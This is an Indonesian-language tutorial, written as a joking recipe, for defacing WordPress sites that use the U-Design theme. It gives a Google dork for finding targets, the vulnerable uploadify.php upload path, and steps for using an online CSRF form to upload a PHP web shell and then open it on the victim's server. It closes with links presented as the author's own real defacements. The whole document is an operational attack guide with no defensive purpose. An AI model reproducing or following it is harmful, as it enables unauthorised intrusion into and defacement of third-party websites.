Bahan-Bahan :
1. Maskawin seperangkat alat sholat
2. Buku Nikah dan penguhulu
3. Dork :
Standar : inurl:/wp-content/themes/u-design/
yang saya pakai : inurl:/wp-content/themes/u-design/sliders/ site:uk
Note : uk nya boleh di ganti dengan domain yang lain
4. Exploit : /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
5. CSRF : Karya Drach Levia - Touch Me Senpai :*
Step by Step :
1. Dorking dulu di gugel, terserah mau dorking biasa atau dorking gambar
2. Jika sudah dapat target masukan exploit. Contoh : www.targetsuka.co.li/[path]/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
3. Juka Vuln Akan Blank biasanya, selain blank mungkin kaga vuln
4. Masukan url target kalian ke CSRF online, post name nya pilih Filedata, klik next lalu upload file kalian :v
5. Jika vuln/berhasil hasil nya akan seperti ini
6. Akses shell nya www.targetsuka.co.li/namafile.php atau www.targetsuka.co.li/[path]/namafile.php
7. Dan jrengg jrenggg :v akses shell sudah berhasil di buka :v (jangan main buka-bukaan ah :v)
Hasil deface saya :
http://allwikan-dev-factory.com/wordpress/
http://allwikan-dev-factory.com/wordpress/
https://defacer.id/122637.html
EmoticonEmoticon